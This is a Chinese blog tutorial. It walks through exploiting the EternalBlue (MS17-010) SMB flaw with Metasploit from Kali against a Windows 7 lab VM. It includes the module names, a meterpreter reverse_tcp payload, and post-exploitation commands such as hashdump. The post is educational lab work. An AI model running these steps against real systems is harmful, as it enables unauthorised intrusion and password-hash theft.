Metasploit(MSF)实战_永恒之蓝漏洞拿下win7靶机

声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间

一、Metasploit(MSF)简介

Metasploit与2003年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带数百个已知的软件漏洞,从此,每个人都可以成为黑客,任何人都可以使用常见的攻击攻击一台计算机,软件厂商也不能够再推迟对于已经发布的漏洞的补丁。

Metasploit主要包含以下几个模块:

1.辅助模块(Auxiliary): 主要用于渗透信息收集,提供了多种漏洞的详细信息

2.漏洞渗透模块(exploits): 也叫攻击模块,利用已知的安全漏洞对远程目标系统的漏洞进行攻击

3.攻击荷载模块(payload): 成功入侵计算机后运行的一段可执行的代码

4.后渗透模块(Post): 进一步收集被攻击的目标系统的各种信息

5.编码模块(encoders): 通过对payload进行各种编码来绕过一些防御系统或防御软件的检测

二、永恒之蓝简介

永恒之蓝(Eternal Blue)是一种利用windows的系统的SMB协议漏洞来获取系统最高权限,从而达到入侵计算机目地的漏洞,于2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布,5月12日被不法分子改造成了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。

*SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

三、渗透攻击过程

*实验环境

虚拟机VMware15

攻击机:Kali_linux2020版    IP地址:192.168.122.134  

靶机: windows7 x64      IP地址:192.168.122.132

*两台虚拟机均以NAT方式连接,win7以关闭防火墙,可以互相ping通

*tips:担心损伤虚拟机重新配置安装很麻烦的话记得给虚拟机拍个快照哦

IP地址展示:

win7防火墙已关闭

两台虚机机之间的ping测试

实战操作步骤

首先在kali中开启postgresql数据库(kali中默认自带)

service postgresql start     //开启postgresql数据库
service postgresql status    //查看postgresql数据库运行状态,Actice那一栏显示active则成功开启,如下图

此时可以按 q 键退出查看数据库状态

这里解释一下为什么要开启postgresql数据库,这是因为msf工具需要利用postgresql数据库记录渗透扫描结果和信息

然后初始化一下msfdb数据库,它提示我需要root权限,所以我这里切换了一下root权限

看到两个黄色的感叹号说明初始化成功

然后开启msf,直接输入命令

或者在左上角的应用程序中找到漏洞利用工具,效果是一样的

这个时候我们成功进入了msf并且看到了一些相关信息,例如我们的msf是5.0.87的版本

其中由2006个攻击模块,1096个辅助模块,343个后渗透模块,562个攻击荷载模块等等

然后我们检查一下数据库的状态,看到是已经成功连接

这里我们简单介绍一下模块信息的查看,已经了解的话可以跳过,例如你可以用show exploits命令查看exploits模块,因为模块太多,需要等待一会

我这里一共找到了两千多个exploits模块信息,他们的名命格式是 操作系统/服务/名称

例如这个第0条,记录的是aix操作系统下的localf服务的ibstat_path漏洞,disclosure表示它的发布时间,rank表示它的好用级别(manual一般,excellent优秀,good良好,average平均),最后的description是描述

然后我们继续渗透

首先搜索永恒之蓝模块

auxiliary表示辅助模块,exploit表示攻击模块,我们先用辅助模块对靶机进行目标收集,看其是否存在漏洞,这里快捷选择直接用use

然后我们用options查看参数,后面required表示是否需要设置,我们只需要设置yes的选项,但是可以看到,其中的端口(rport),进程(threads)等选项已经有默认值,我们这里只需要设置rhost(目标地址)

然后我们run,根据第一行回显信息可知,目标主机很可能存在ms17_010漏洞(永恒之蓝)

然后我们利用攻击模块对其展开攻击

可以看到,我们仍然只需要设置rhosts,然后我们run或者exploit都可以

但我们看到win时,我们就攻击成功了

这个时候我们直接进入了shell,可以看到我们已经拿下了win7系统的最高权限

我们也可以查看win7的IP地址,中文字符出现了乱码的话可能要在kali上调整一下编码方式,不过还是可以看到ipv4地址与虚拟机中的一致

至此,我们拿到了目标靶机的最高权限,后面的大家就可以自己玩了,如果还有什么疑惑,欢迎留言评论或私信

!还是那句话,大家自己搭靶机玩玩就行了,切勿用于非法用途

下面是一些补充内容

*MSF基本攻击流程

这里是附加信息,已经了解的可以跳过

1.扫描靶机,检测靶机上的漏洞,选择相应的模块,例如使用ms17_010进行攻击,use auxiliary/scanner/smb/smb_ms17_010

2.options检查并设置相应的参数,例如set rhosts 192.168.1.1

3.攻击靶机,run/exploit

4.选择payload,set payload windows/x64/meterpreter/reverse_tcp

5.攻击,run/exploit

*其他攻击命令

获取hash密码:meterpreter>hashdump

查看用户权限:meterpreter>getuid

获取屏幕截图:meterpreter>screenshot

获取shell:meterpreter>shell

 

参考资料

https://blog.csdn.net/qq_41453285/article/details/97040039

https://blog.csdn.net/wwl012345/article/details/89421881

感谢上述博主的优秀博文

评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

monster663

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值